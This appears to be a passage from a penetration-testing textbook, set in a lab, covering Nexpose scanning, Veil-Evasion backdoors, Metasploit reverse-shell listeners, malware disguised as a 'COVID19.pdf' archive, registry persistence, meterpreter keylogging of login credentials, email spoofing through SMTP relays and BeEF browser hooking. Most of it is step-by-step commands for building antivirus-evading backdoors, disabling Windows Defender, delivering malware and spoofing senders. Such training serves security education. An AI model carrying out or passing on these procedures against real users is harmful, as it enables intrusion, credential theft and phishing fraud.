NIST National Vulnerability Database ( https://nvd.nist.gov/)

US government repository of standards-based vulnerability management

data represented using the Security Content Automation Protocol
(SCAP). This data enables automation of vulnerability management,
security measurement, and compliance. The NVD includes databases of
security checklist references, security related software flaws,
misconfigurations, product names, and impact metrics.

CVE Common Vulnerabilities and Exposures Details

(https://www.cvedetails.com/) The Common Vulnerabilities and
Exposures (CVE) system provides a reference-method for publicly
known information-security vulnerabilities and exposures. The
National Cybersecurity FFRDC, operated by the Mitre Corporation,
maintains the system, with funding from the National Cyber
Security Division of the United States Department of Homeland
Security. The Security Content Automation Protocol uses CVE, and
CVE IDs are listed on MITRE's system as well as in the US
National Vulnerability Database.

5.4. Vulnerability Management with Nexpose

Rapid7 Nexpose is a vulnerability scanner which aims to support the
entire vulnerability management lifecycle, including discovery,
detection, verification, risk classification, impact analysis, reporting and
mitigation. It integrates with Rapid7's Metasploit for vulnerability
S_E_Oblako

exploitation. It is sold as standalone software, an appliance, virtual

machine, or as a managed service or private cloud deployment. User
interaction is through a web browser. There is a free limited community
edition of Nexpose, as well as commercial versions.
S_E_Oblako

Exercise 25: Vulnerability Management – installing Nexpose

Note
Nexpose is a server software that need minimum 8G RAM and more than
100 G disk space and it might not work in virtual machine if you do not have
enough memory and disk space for Kali.

From Kali machine

Download Nexpose Free Community from the following Link:
https://www.rapid7.com/info/nexpose-community/

Fill the information to get one-year free license key via email.
Download Linux version as we are going to use in kali Linux.
Stop Postgresql database in Kali Linux because Nexpose come with
its own postgresql database and it will conflict with Kali Linux
database

#service postgresql stop

S_E_Oblako

change the Nexpose downloaded file to executable file.

run file

# ./Rapid7setup-Linux64.bin

follow the GUI installer.

Choose “ Security Console with local Scan Engine”.
Enter username and password to be used to access Nexpose
(root/password)
S_E_Oblako

Do Not choose “ Initialize and start Nexpose after installation”

5.5. Starting and Configuration Nexpose

Go to Nexpose directory inside Kali

#cd /opt/rapid7/nexpose/nsc

start Nexpose

#./nsc.sh
S_E_Oblako

First time it will take about 30 minutes to start because it will update
its vulnerability database.
Open Firefox and go to Click on Advances
https://localhost:3780

Click on advanced then accept Risk

Login with the username and password you setup during Nexpose
S_E_Oblako

installation and then enter license number that you received from
Rapid7 via email.

Note
If you choose to start Nexpose service automatically during the installation
that could cause Nexspose to fail to start, if you face that scenario do the
following:
- Stop Nexpose Service (see command in the above screen capture)
- Disable Nexpose from starting automatically
- Start Nexpose service
- Restart Kali Machine
- Start Nexpose
S_E_Oblako

Exercise 26: Running Nexpose

1. Start Metasploitable machine from Virtual Box and check its IP
address
S_E_Oblako

2. In Nexpose configuration GUI, create a site, give the site Name and
description
S_E_Oblako

3. Click on Sites and add the IP address of the machines that you need
to scan them

4. Click Save
5. Click one Site Name

6. Click Scan Now and give the scan a Name then start the scan
7. The scan will take at least 15 minutes to finish
S_E_Oblako

8. To see the details about the found vulnerabilities, click on the

machine name

9. click on the vulnerability to see detailed information

S_E_Oblako

5.6. Nexpose Reports Analysis

You may want any number of people in your organization to view asset and
vulnerability data without logging on to the Security Console. For example, a
chief information security officer (CISO) may need to see statistics about
S_E_Oblako

your overall risk trends over time. Or members of your security team may
need to see the most critical vulnerabilities for sensitive assets so that they
can prioritize remediation projects. It may be unnecessary or undesirable for
these stakeholders to access the application itself. By generating reports, you
can distribute critical information to the people who need it via e-mail or
integration of exported formats such as XML, CSV, or database formats.
Reports provide many, varied ways to look at scan data, from business-
centric perspectives to detailed technical assessments. You can learn
everything you need to know about vulnerabilities and how to remediate
them, or you can just list the services are running on your network assets.
You can create a report on a site, but reports are not tied to sites. You can
parse assets in a report any number of ways, including all your scanned
enterprise assets, or just one.

Exercise 27: Nexpose Analysis and Report Generating

After finish scanning, you can create a PDF report from the system, in this
exercise we are going to generate summarize report that include
recommendation of what you need to be done regarding discovered
vulnerabilities
To create a professional PDF report for the scanning:

Click on the Report icon on the right left side of the screen
Give Name to the report
Choose the report type:
Audit Report: detailed report about each vulnerability.
Executive Report: Summarized Report
Newly discovered Assets: if you scanning a complete
subnet it will show discovered devices
Top 10 vulnerabilities Report
Choose the scan
Run the report
S_E_Oblako
S_E_Oblako

To reset Nexpose Password :

#screen –x nexpose
➢ Reset password < username> < new password> <new password>
➢ Unlock account <username>
S_E_Oblako

5.7. Other Nexpose functions

Discovered Devices

Discovered Vulnerabilities
S_E_Oblako

6
Gaining Access (Client-Side Attacks)

Client site attack differ from Server side attack because it need the
end user interaction by downloading and running a malware that
will create a back door inside the client machine or gather
information from the client machine and send it to the hacker
machine. this kind of attacks need a lot of information gathering
and social Engineering to convince or deceive the client to click on
a file or link sent to him. In this section we are going to use Veil-
Evasion framework to generate payload executable that can bypass
common Antivirus software. Viel Evasion is an open source
framework that located at https://www.veil-framework.com/
S_E_Oblako

6. Gaining Access (Client Site Attacks)

Client Site attacks is used if Server-side attacks are failed
Require user interaction
Social Engineering can be useful
Information gathering is vital

6.1. Using Veil Evasion Framework

Veil-Evasion is a tool designed for penetration testers and red teams to
simulate bypasses of common Antivirus products. Tools like this are of high
value to offensive security professionals, as they can be used to emulate a
more persistent attacker who will try to bypass an Antivirus system through
trial and error. Without a tool such as Veil-Evasion, offensive security
engagements would take longer time.
Veil-Evasion can work on existing executables, or simply create a wide range
of payloads with shellcode added to them. Most cases use a shellcode-based
method, as the resulting payload has a better chance of evading Antivirus
systems.
Considering that a tool like this is used by professional organizations to
simulate an attack by adversaries, it would make sense to allow a user to
automate the generation of a payload from a central location. This allows it to
be integrated into attack workflows, which lets offensive security
professionals work more efficiently.
In Summary:

Veil is a framework for generating backdoors that is not detected by

Anti-Virus.
Backdoor is a file that is when executed in a computer it will give a
full access to that computer.
Veil framework is located at Github

The steps to do Backdoor attack:

Create the backdoor file using Veil.

Checking the file against Anti-Virus.
Listening to connection using Metasploit.
S_E_Oblako

Delivering and executing in file to target machine.

S_E_Oblako

6.2. Installing Veil 3.1 In Kali Linux

Exercise 28: Client-Side Attacks – Installing Veil Evasion
1. Go to Veil page at Github https://github.com/Veil-Framework/Veil
2. copy the link from Github

3. open terminal in Kali

4. go to /opt directory and type:

# git clone https://github.com/Veil-Framework/Veil.git

5. now go to Veil directory

S_E_Oblako

#cd Veil

6. Go to config directory to run setup file in a silent mode (installing

default configurations)

#./setup.sh --silent --force

7. After Veil completely installed close the terminal and open new
terminal and start Veil

#cd Downloads/Veil/Veil/
#./Veil.py

As you can see the green commands that we can run in Vial.

8. Type

#list
Evasion: is the program which generate backdoors
Ordnance: The program that generate the payload that used by Evasion, The
payload is a part of the code that allow us to control the target machine like
S_E_Oblako

reverse connection, download or upload files from/to target machine.

Exercise 29: Creating Backdoor malware
1. to start using Evasion just type Veil>: use 1

2. #list command will show us all the loaded payloads

S_E_Oblako

Meterpreter is a dynamically extensible payload that uses in-memory dll

injection extended over the network at runtime. Because this payload runs
only in memory, it allow us to do anything untraceable, no files installed in
the target computer hard disk and we can use this payload to connect to other
target computer in the network and do anything the normal user can do in his
computer, it will give full control like installing keylogger inside the machine
and other malwares, download files, run programs ..

3. Use Evasion payload 7 which is reverse TCP connection:

Veil/Evasion>: use 7
S_E_Oblako

4. Configure the payload by entering LHOST (Kali Machine IP

S_E_Oblako

address) and if you like to change the port, change the value of
LPORT.
5. Type: generate to generate the payload then, give a name to the
new windows malware created.
6. The File will be stored /var/lib/veil/output/compiled/revtcp23.exe
7. This file is the malware that when installed in Windows 10 machine
and not detected by Windows defender or other Antivirus software
,it will create a backdoor connection from the victim to the attacker
machine which its IP address provided as part of the file creation (
Kali ) ,also The port is configured because the Attacker machine
need to listen to that port in order to make the connection.
S_E_Oblako

6.3. How Anti-Malware work

Anti-malware/Anti-virus programs scan for malware using a database of
known malware definitions (also called signatures). These definitions tell
what the malware does and how to recognize it. If the anti-malware program
detects a file that matches the definition, it will flag it as potential malware.
Heuristics
Another way Anti-Malware (AM) detects bad software is a form of analysis
called heuristics. An alternative to database scanning, heuristic analysis
allows anti-malware programs to detect threats that were not previously
discovered. Heuristics identifies malware by behaviors and characteristics,
instead of comparing against a list of known malwares.
For example, if an application is programmed to remove important system
files, the anti-malware software may flag it as malware. Heuristic analysis
can sometimes result in “false positives,” or programs flagged as malware
that are legitimate.
Sandboxing
A third way Anti-Malware software can find malware is by running a
program it suspects to be malicious in a sandbox, which is a protected space
on the computer, similar to a virtual machine within the OS. The suspected
program believes it has full access to the computer when, in fact, it is running
in an enclosed space while the anti-malware monitors its behavior. If it
demonstrates malicious behavior, the anti-malware will terminate it.
Otherwise, the program can execute outside the sandbox. However, some
forms of malware are smart enough to know when they are running in a
sandbox and will stay on their best behavior…until they are allowed free
access to the computer.
Removal
The anti-malware does not just flag malware. Once malware has been found
on a system, it needs to be removed. Many threats can be deleted by the anti-
malware program as soon as they are detected. However, some malware is
designed to cause further damage to computer if it is removed. If the anti-
malware suspects this is the case, it will usually quarantine the file in a safe
area of computer storage. Basically, the anti-malware puts the malware in a
timeout. Quarantining a malicious file prevents it from causing harm and
S_E_Oblako

allows you to remove the file manually without damaging your computer.
Checking if the generated file is detected by AV
There are some websites that scan the software against well-known anti-
malware detection software, some these sites like virus total will take the
signature of the file that you upload and will update the anti-malware
software vendors. The free websites that do not share uploaded files do not
stay live for a long time.
There are websites that review and rank these websites and show if the
website shares the uploaded file with antivirus vendors or not. you need to
search Google for “Online Multi Engine Antivirus scanners”
Here is an example:
S_E_Oblako

These sites will ask you to upload your file, then they scan it and give you the
results.
S_E_Oblako

6.4. Listening to incoming connectios

Exercise 30: Setup Hacker machine to listen to Incoming
connection
Since the backdoor that we created in the previous exercise uses a reverse
payload, we need to setup Kali to listen for incoming connection using
Metasploit framework and configuring it with the port that it should listen to.

1. open new terminal windows in Kali and type

#msfconsole
S_E_Oblako

2. use a module in Metasploit called exploit/multi/handler that

allow us to listen to incoming connections from our payload file.

3. Setup the parameters of the exploit as shown in the screenshot

below

4. to start listening type

#exploit to start

Notes
S_E_Oblako

If you get error “failed to bind to” either change the port in
the Veil file created and repeat the Listening steps in Kali or
use the below procedure to see what process using the port
8080.

Use the following commands in Kali to determine which

process using the port 8080

#netstat -a : will show all connections to the machine.

#lsof -i:< port number> to check specific port and which services
is using it.

You can Kill the process that is using the port 8080
S_E_Oblako

6.5. Delivery Method

There are many ways to deliver the Malware to victim’s machines, the
method depends on the attacker intention, and if he is targeting specific users
or any user. the attacker will choose the delivery method after gathering
information about the victim and understanding how to exploit the victim
using social Engineering and other means. The delivery method could be
through a phishing email that have a link to a malicious website or
attachment of the malware. For example people looking for free software or
crack to a software license, attacker can exploit their desire to not paying for
a software license and have the malware named as a crack engine available to
download, even the attacker provide instructions to users about how to
disable Anti-malware software claiming that anti-malware software will
block the crack from working. Also, Malware can be delivered in a form of
Word Document or imbedded inside an image or a PDF file.

Exercise 31: Malware Basic Delivery Method

Basically, we are going to put the backdoor in kali web server and download
it from the target machine just to make sure that file works.

1. Copy backdoor file to Kali web server

2. Go to Kali web server folder located at var/www/html and create
new folder to have the malware files stored under that folder and
available to download.
3. Copy the Veil file created to that location

#mkdir malware
#cp /var/lib/output/compiled/revtcp23.exe /var/www/html/maleware

4. If you already have index.html file under html folder then create a
new folder under html folder and put the vail created file under it.
S_E_Oblako

5. Start web server at Kali

#service apache2 start

6. start Windows machine from VBOX and open Browser and connect
to Kali website then go to http://Kali_ip/maleware

7. Click on the file revtcp23.exe and choose to run it anyway.

8. Windows Defender may detect the file and delete it, for testing
purposes disable Windows Defender.
9. check Kali and you should see one session opened with the
Windows Machine.

10. when you get meterpreter session that mean that the backdoor
successfully made reverse connection to Kali machine.
11. In Kali meterpreter session type >sysinfo

12. Type >help to see available commands and functions that you
can run on the victim machine.
S_E_Oblako

Notes

I run the file manually in Windows machine just to prove

that the file actually works .
Most likely the AV will detect the file and delete it or stop
it from working so sometimes you may need to stop the
AV in Windows machine just to make sure the file works.
Most users who has outdated AV will not detect the file.
To disable Windows Defender: Go to Run then type
egpedit.msc and go to Administrative Templates →
Windows Components → Windows Defender
Antivirus and turn off Windows Defender
Basically bypassing Antivirus programs or any other
security layer is like a game of cat and mouse, so
backdoors might start getting detected at some stage, then
the developers release new update, this will allow you to
generate undetectable backdoors, then AV programs
release an update which will make backdoors detectable.
Make sure that Veil or any other tool you are using to
generate the backdoor is up to date.
S_E_Oblako

Exercise 32: Creating Encrypted backdoor

Encrypted backdoor will make the communication between the victim
machine and the attack machine is encrypted and no one can see the type of
traffic uploaded or download to/from the victim machine.
Veil can create encrypted backdoor using reverse_https connection and Kali
Metasploit can use same reverse_https to listen and decrypt the packets

1. To create Encrypted backdoor

2. Start Veil

3. use option 15 rev_https

S_E_Oblako

4. Set the options of the rev_hhtps

S_E_Oblako

5. The PROCESSORS and SLEEP parameters will not affect the file,
but they will help in the Antivirus evasion as they change the file
signature
S_E_Oblako

6. Copy the generated file to the /var/www/html/maleware to make

the file available for download through Kali website

7. In Kali start the listener through msfconsole :

#msfconsole
msf5> set exploit/multi/handler
msf5>set payload windows/meterpreter/reverse_https
msf5>set LHOST 10.0.2.23
msf5>set LPORT 4445
S_E_Oblako

msf5>exploit

8. From Windows 10 machine access the Kali website and download

the file revhttps.exe and choose to run anyway when Windows give
you warning

9. Look at Kali Listener, you can see the reverse connection is

established and using https which mean the connection is encrypted
10. In meterpreter session type meterpreter>shell to get Windows
S_E_Oblako

shell
S_E_Oblako

6.6. Control hacked Devices with Kage Tool

Kage is a tool designed for Metasploit RPC server that interact with
Meterpreter sessions and generate payloads that support Windows
Meterpreter and Android Meterpreter.Kage makes Metasploit setup easier
through GUI configuration of creating backdoor malware, setup Metasploit
listener and many other Metasploit functions

Exercise 33: Using Metasploit GUI Kage

1. In Kali open browser and go to https://github.com/Zerx0r/kage

2. Download Kage by clicking on “you can install Kage binaries from

here” at the same page”.
S_E_Oblako

3. Then download the Linux version Kage.0.1.1-

beta_linux.Applmage

4. Navigate to the downloaded file from Kali terminal

5. Change the file to executable and run it from the terminal.

#chmod +x Kage.0.1.1.-beta_linux.AppImage
S_E_Oblako

#./Kage.0.1.1.-beta_linux.AppImage &

6. Manually start Metasploit from terminal then load msgrpc

#msfconsole
msf5>load msgrpc
S_E_Oblako

7. Copy the password provided by msgrpc , then go to Kage and enter

the username msf end enter the password and uncheck “over https”
then click connect.

8. After clicking Connect, the following windows will appear

S_E_Oblako

9. Creating a backdoor with Kage is easy

10. Go to the folder Kage under root and rename the file to .exe
S_E_Oblako

11. Create a listener using Kage

12. Copy the backdoor to /var/www/html/maleware

13. Start windows machine and go to the Kali website and download
the kagetest.exe backdoor and run it anyway

14. Go back to Kali and open kage and click on sessions

15. Click on interact then click on Screenshot button

S_E_Oblako

.
S_E_Oblako
S_E_Oblako

Notes

Kage is still new software at the time of making this book

(beta), some of the features like having camera stream or
microphone are not working. However, it is very useful
software allowing easy management of sessions and control of
hacked machines.
Kage can list and control sessions that created manually by
direct command msfvenom or Veil backdoors.
Normally backdoors generated through msfvenom is easily
detected by antivirus programs.
You can interact manually with Kage session from terminal by
listing the sessions from msfconsole.
S_E_Oblako

6.7. Embedding Malware into PDF and JPG files

PDF can be embedded with malware in two ways, one is using PDF
vulnerability if there is one exists, and then using exploit to use that
vulnerability, Metasploit has two exploit for old PDF vulnerabilities that can
work in Windows XP and Adobe 9. These vulnerabilities do not work in
Windows 8 and up, with the latest Adobe readers. The other way does not
depend on vulnerabilities on the Adobe of PDF file itself, rather combining
malware file with PDF file and giving then a name as a PDF file. Hackers
will Depend on deceiving the victim to run the combined files thinking that
he is running a PDF file. When the two files run the PDF will be opened in
the desktop of the victim machine as normal but at the same time the malware
will create a backdoor to hacker machine. Similarly, we can replace the PDF
file with image JPG file and combining it with malware.
Exercise 34 Embedding Malware into PDF file
1. Use the same malware file that we created in previous exercises or
generate a new file.
2. We are going to use Windows machine to do the file joining (PDF +
Malware)
3. Start Windows 10 Virtual machine
4. Use the malware file we used in Kage exercise (kagetest.exe)
S_E_Oblako

5. Move the file to Windows Desktop

6. Download Adobe PDF icon image from the internet.
7. Create ico file for the PDF icon image (ico is a thump of an image).
8. Go to https://icoconvert.com ( or any other ico converter website)
S_E_Oblako

9. Convert ICO and download to desktop

10. Have a real PDF file that will be used to hide the malware.
11. In the windows desktop, you should have the following files.
S_E_Oblako

12. Highlight Malware and PDF file and add them to archive

13. Give the archive a name and choose create SFX archive then click
on advanced
S_E_Oblako

14. Click on SFX options -> update and choose Extract and update
files and overwrite all files (see screenshot)
S_E_Oblako

15. Then click on Setup tab and add the malware name ended with .exe
and followed by Pdf file name ended with pdf
S_E_Oblako

16. Click on Modes and click on hide start dialog

S_E_Oblako

17. Then click on Text and icon tab, in the bottom load SFX icon from
file and choose the ico file that we created.
S_E_Oblako

18. OK then OK and final file will be generated.

S_E_Oblako

The file COVID19.pdf is the final embedded PDF file that when opened the
malware will automatically started and make a reverse connection to the Kali
machine.

19. In Kali we are going to setup msfconsole (Metasploit) to listen to

incoming connection from the victim machine that run the PDF
file. We are going to setup msfconsole to send persistence script to
the victim machine after the first connection established. The script
will change some Windows registry setting to make the malware
file independent from the PDF file and start automatically when the
Windows machine rebooted .

#msfconsole

Load msgrpc ( to use Kage as session GUI controller)

S_E_Oblako

#use exploit/multi/handler
#set PAYLOAD windows/mterpreter/revrese_tcp
#set LHOST 10.0.2.23
#set LPORT 4444
#Set ExitOnSession false
#set AutoRunScript exploits/windows/local/persistence LPORT=4444 (this
command to make the malware file persistence )
#exploit -j
S_E_Oblako

20. Go to Windows machine and open the PDF file, the reverse
connection will start to Kali

#sessions
#sessions 1

21. Start Kage and setup job to interact with the session
S_E_Oblako

22. Go back to Windows and close the PDF file, notice that the session
did not close.

23. Reboot Windows machine and monitor Kali msfconsole for new
S_E_Oblako

sessions ( to check the persistence module works)

24. Type >sessions

>Sessions 3

25. In Kage remove the old sessions and create new session because the
session number is change after the reboot.
26. To Clean up Windows 10 from the Malware persistence mode
delete the Jvb script located under
c:/Users/Administrator/AppData/local/Temp or use the provided
cleanup script

Meterpreter> resource <<location of clean up script>>

Exercise 35 Embedding Malware inside image file
S_E_Oblako

Same procedure used to imbed a PDF file with malware, can be used to
embed an Image with malware.

1. Go through exercise 34, just replace the PDF file with an image.

6.8. Protecting against smart delivery methods

There are three ways to protect against smart backdoors delivery methods,
blocking or preventing Man in the Middle by using trusted networks, VPN
clients or using Xarp in systems, Xarp application that detect and ARP
poisoning, Xrap free version can be downloaded from
http://www.xarp.net/#download
Only use https connections to websites as they are encrypted and cannot be
patched in the fly.
Use hashing, hashing is a file signature that the file you downloaded into
your machine is the same file that the publisher has in his website and not
changed in the way, normally file publisher have file hash published in their
website beside the file name to be downloaded.
When you download a file and before running the file into your machine
generate the file hash and compare it to the hash number published in the
owner website, if the two numbers are identical then the file is save and did
not changed in the way if they do not match then the file is not save.
Generating hash can have done through command line or their GUI tool that
available on the internet.
S_E_Oblako

7
Post
Exploitation

As the term suggests, post exploitation basically means the phases

of operation once a victim's system has been compromised by the
attacker. The value of the compromised system is determined by
the value of the actual data stored in it and how an attacker may
make use of it for malicious purposes. This phase deals with
collecting sensitive information, documenting it, and having an
idea of the configuration settings, network interfaces, and other
communication channels. These may be used to maintain persistent
access to the system as per the attacker's needs.
S_E_Oblako

7. Post exploitation
Post exploitation is that after the attacker gain access to the victim computer
using backdoor program or another method, he will try to have full control of
the victim PC by reading, copying, writing or deleting files and running PC
peripherals like Camera , mic , ..etc. In this section we have exercise to
create backdoor file using Veil and then using Metasploit console to listen to
the request to connect coming from the backdoor file when it is delivered to
the victim PC, for testing purposes we are going to use same file created in
exercise 32 and the same basic delivery method which was through Kali
website.
7.1. Metasploit meterpreter commands
Exercise 36: Post Exploitation
1. Start Kali Machine

2. Check the port used in the backdoor file that created by Viel in
Exercise 32

3. In Kali start webserver apache2

#service apache2 start

4. Setup Kali to listen to connection

S_E_Oblako

5. Start windows machine

6. Access the Kali website that contain the backdoor file from exercise
32

7. In windows Run the file downloaded from Kali website.

8. Looking at Kali listener you will see the connection established and
you have meterpreter session

9. To see all possible commands that we can run in the victim machine
run command
S_E_Oblako

meterpreter>help
meterpreter>background
10. The background command makes the backdoor running in the
background.

meterpreter>sessions
show currently running sessions

11. to interact with the session, you need to write command

>sessions 1 ( to connect back to the session )

12. meterpreter>ipconfig (which will show Windows network

configurations)
S_E_Oblako

7.2. Process impersonation

Metasploit meterpreter can change the process ID of the malware software to
take another Windows process ID. This will make the malware more
deceiving when someone look at Windows running processes.
meterpreter>ps
ps command will list all running processes in the target computer
S_E_Oblako

As we can see that Microsoft Edge process ID is 816

meterpreter>migrate 816
The command migrate will allow us to migrate the backdoor process to use
MicrosoftEdgeCP.exe process number 816 which is the process ID for Edge
to be less subspecies to the victim machine

Notes

You can migrate to any process in Windows, but the

best process to migrate to, is Edge.exe because it is
always used and not suspicious and have a full
control in the Windows machine.
If you look at Windows Resource Monitor under
Network, you can see that the exploit process using
explorer to connect to Kali machine.
S_E_Oblako

7.3. Controlling Victim file system

After getting connected to victim machine through Metasploit msfconsole,
meterpreter will allow a full control of the machine file system and should be
able to browse all files and directories and download, upload, delete, write
files and running new processes.
Exercise 37: Controlling victim file system
1. Meterpreter allows us to control the victim machine and navigate
through its files and directories, we can also download and upload from
the machine.

2. Here is a list of file system commands that I can run in the victim
machine
S_E_Oblako

3. Download a file from victim machine through meterpreter command

S_E_Oblako

4. See the file in Kali machine under /root

S_E_Oblako

Note
To deal with Windows files or folders names that have space
put the name between single quotation marks ‘xxxx xxxx’ .
5. Meterpreter allow to get direct Windows shell.
To switch back to meterpreter hit Control + C

7.4. Maintaining Access

The connections to the victim machine explained above is not persistence and
the connection will stop when the Victim machine is rebooted. The backdoor
file will not start by itself again. In this section we will create persistence
connection that once the backdoor installed it will try to connect to the Attack
machine (Kali) automatically every time the Windows machine started. We
are going to do this by injecting the backdoor as a service.

Exercise 38: Maintaining Access using persistence mode

6. Disconnect previous sessions and restart MSF console again
S_E_Oblako

7. Setup Listener connection again with persistence mode (see commands

in the screenshot below)

8. Go to windows machine and run the malware file again, and watch
msfconsole output
S_E_Oblako

9. The screenshot above is from msfconsole when the incoming connection

from Windows machine is detected , msfconsole it will do the following
actions automatically
- Meterpreter session is established between Kali and windows
machine.
- Starting persistence mode.
- Meterpreter will write a Visual Basic script (JVB ) to windows and
store it under c:\windows\temp
- Meterpreter will install Windows registry key to automatically
starting the JVB script , the Registry key :
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cnPksfSWgN
(the last name is automatically changed by the script )

5. In Kali exit Msfconsole , and run it again and setup listener to

listen to connection without persistence commands
S_E_Oblako

6. Restart Windows Machine

7. Connection will be established automatically

8. Cleaning script to undo the persistence mode is stored in Kali under
/root/.msf4/logs/persistence/<name of Windows
machine>/Name_of session.rc
9. To clean up just run the command Resource from meterpreter
followed by the location of the rc file.

7.5. Key-logger and screenshots

Using meterpreter you can capture screenshots from the victim PC and all
keys typed by the victim even passwords.
Exercise 39: Setting up Key-logger
1. This exercise is based on exercise 38 with the backdoor is running
on the victim machine and already connected to Kali machine.
2. Depending on the backdoor file that explained in the previous
section and running meterpreter you can capture keys from the
victim machine as follow:
S_E_Oblako

#meterpreter> keyscan_start

3. Go to Windows machine and try to login to Facebook or do any

activity
4. Comeback to Kali and type:

#meterpreter> keyscan_dump

5. You will see the keys that entered in the Windows machine

6. The facebook user name [email protected] and the password

is facebook passord
7. Stop Key scan

#meterpreter> keyscan_stop
8. To see screenshot from the victim machine
S_E_Oblako

8
Social
Engineering

Hackers use social engineering tactics because it is usually easier to

exploit your natural inclination to trust than it is to discover ways
to hack your software. For example, it is much easier to fool
someone into giving his password than trying to hack the system
and extracting his password (unless the password is weak).
Security is all about knowing who and what to trust. It is important
to know when and when not to take a person at their word and if
the person you are communicating with is who they say they are.
No matter how many locks and deadbolts are on your doors, if you
trust the person at the gate who says he is a pizza delivery guy and
you open the door for him without checking, you are completely
exposed to whatever risk he represent.
S_E_Oblako

Social Engineering depended on information gathering, in this

section, we are going to use Social Engineering tools to gather
information about victims and also we are going to use Kali
sendmail option with SMTP relay to send spoofed emails to
victims.
S_E_Oblako

8. Social Engineering
Social Engineering depend on information gathering about the target,
whether the target is a person, a company, or a web site. The methods of
information gathering do not need to be close to the target and use techniques
such as man in the middle. The type of information that gathered about the
target is their Facebook, LinkedIn, Google accounts, their friends, what web
sites that usually visit and more. After gathering information about the
target, then the attacker will build strategy on how to gain access to that
target either by gaining their trust and send them a backdoor software or by
making them reveal their account password. There are many ways to gather
information about a person or an entity, some are free tools available through
the internet such as Google Dorks, other tools that is come preloaded with
Kali such as Recon-ng.
After gathering information Hackers will start building strategy to attack the
victim, which could be an email from a friend or other trusted source. Taking
advantage of the trust and curiosity, the message of the email may contain a
link that you just have to check out–and because the link comes from a friend
and you’re curious, you’ll trust the link and click on it –and be infected with
malware so the Hacker can take over your machine and collect your contacts
info and deceive them just like you were deceived. Or a message that contain
compelling story that your ‘friend’ is stuck in country X and he lost all his
money and need you to send him money.
Also, Social Engineering may take a form of bait, these social engineering
schemes know that if you dangle something people want, many people will
take the bait. These schemes are often found on Peer-to-Peer sites offering a
download of something like a new movie, or music or software with ‘Crack’.
8.1. Maltego
Maltego is a cross platform application, for performing link analysis.
Discover relationships between entities and build a visual representation of
different data with a graph-based layout. A transform is a process that pulls
new data related to the entity, automatically extending the graph.
Maltego is commonly used for reconnaissance in penetration testing
engagement and open source intelligence analysis. It is possible to understand
the relationship between infrastructure services and even users when
mapping an organization’s attack surface.
There are two types of Transforms within Maltego, one runs on servers
S_E_Oblako

remotely the other can run locally on the system running Maltego.
Maltego comes installed in Kali Linux , you just need to register the first time
you run the tools in order to get the license

Exercise 40: Running Maltego Tool

1. In Kali, go to applications and run Maltego

2. Click on Maltego CE (Free)

S_E_Oblako

3. Choose to register and enter email address and password, an Email

will be sent to you to activate your Maltego account.
4. Start Maltego and choose to update the tool if there is update.
S_E_Oblako

5. After update is done choose to install Free API, every API there is a
description of the function that API such as querying specific
Database.
6. Some APIs require a key, you need to register with the site
mentioned in the API and they will email you the key.
S_E_Oblako

7. Click on the Plus sign at the top of Malteg.

8. Choose what you want to search for from the left side pane – for
example choose domain – drag and drop in the middle area
S_E_Oblako

9. Right click the domain and click on run all transforms

10. Click run

S_E_Oblako

11. Maltego will use the installed transforms to do a search about the
domain you entered and display a visual links about the found
information. You can verify every link and what kind information it
provided, and you can do deep search in the item found.
12. You can use other tools to help you further know more about the
found items for example you can use Shodan to find out more
inform about a device, if there is a link found, use the web browser
to see the content of that link.

8.2. Email spoofing

Email spoofing is the most used method of delivering malware,
hacking or deceiving other people by sending them email that look
like it is coming from someone they know and embed that email
with a backdoor or a link to harmful website, or a picture that
contain embedded malware that will automatically works when the
picture viewed.
This method depends on information gathering. When targeting a
victim, adversaries will gather information about the victim from
social media and other tools to know his friends, colleagues or
companies he is associated with and try to send him email that looks
like from a colleague or a friend.
Email Spoofing is particularly important in Penetration testing
because it is one of the tactics used to see if the company employees
S_E_Oblako

will be spoofed and give away valuable information just because

they received and email from someone looks legitimate.
There are many ways to send spoofed email, as there are many web
sites offers free spoofed email service, just google for “spoof email
online”. Most of the servers that delivering this service is known to
SPAM blockers and emails from them will be blocked or will end
up in the SPAM directory of this person.
To bypass this problem is either you make your own email server if
you have web hosting plan or sign up for a web hosting and create
your email server and use that to send fake emails.
Or you can sign up for SMTP relay server or a mail server. There
are many websites offer paid SMTP services that you are going to
get a good result because they are used by actual marketers or actual
advertising companies to send email.
Here is a list of best Free SMTP servers that can be used to sed
emails:
SendinBlue over 9000 Free emails per month (
https://www.sendinblue.com/)
Constant Contact ( https://www.constantcontact.com)
Elastic Email (https://www.elasticemail.com)
And there are more free or for a low fee SMTP relay servers
including google Gmail SMTP , MailGun, SendGarid.

Exercise 41: Email Spoofing using Sendinblue server

1. Go to https://sendinblue.com
2. Sign up
3. A confirmation email will be sent to your email where you can finish
up registration
S_E_Oblako

4. Click on Transaction tap to see the authentication information that

needed to send emails

The information in this page will be used in Kali #sendemail tool , the SMTP
S_E_Oblako

server , port, login and password.

5. Open Kali terminal windows

#sendemail --help
S_E_Oblako

#sedemail -xu <username from servce provider> -xp <password> -

stem.relay.server_name:port number -f <”fake or spoofed email address”> -
t <”victim email address ”> -u <”email subject”> -m <”email body”> -o
<”Name of sender”>

6. Use #sendemail command as explained in the above screenshot.

7. This is how is the message going to look in Gmail when it arrive to
the victim email

8. And in office 365 as following screenshot

Note
Most of email servers that uses blacklist services will detect the email from
sendinblue and other free SMTP relay services as spam or promotion because
Anti-Spam vendors will blacklist such services. In exercise above the Gmail
list the mail under Promotion folder and Office 365 show that the email came
via sendinblue.com. The workaround is using Web-hosting services email or
S_E_Oblako

a fake Gmail or other free mail services.

S_E_Oblako

9
Web Browser Exploitation with
BeEF
BeEF stands for the Browser Exploitation Framework. It is a
penetration testing tool that focuses on the web browser. Amid
growing concerns about web-borne attacks against clients,
including mobile clients, BeEF allows the professional penetration
tester to assess the actual security posture of a target environment
by using client-side attack vectors. Unlike other security
frameworks, BeEF looks past the hardened network perimeter and
client system and examines exploitability within the context of the
one open door: the web browser. BeEF will hook one or more web
browsers and use them as bases for launching directed command
modules and further attacks against the system from within the
browser context. BeEF framework generate a one line java code
that when it is inserted in a website, it will hook the website
visitors and create a connection between the visitor web browser
and the BeEF server, then allow attacker to run commands on the
visitor machine.
BeEF comes preinstalled in older Kali versions (2019.2 and older),
so you should not have to install anything if you're running one of
those versions on your computer.
In mid-2019, Kali removed BeEF as a preinstalled exploitation
tool, moving it from "kali-linux-default" to the "kali-linux-large"
metapackage. That means, if you installed a fresh version of kali
Linux , you will need to install BeEF manually.
In this section we are going to run BeEF and see how it hook the
web browser and what commands can be sent from BeEF server to
the victim browser.
S_E_Oblako

9. Browser exploitation
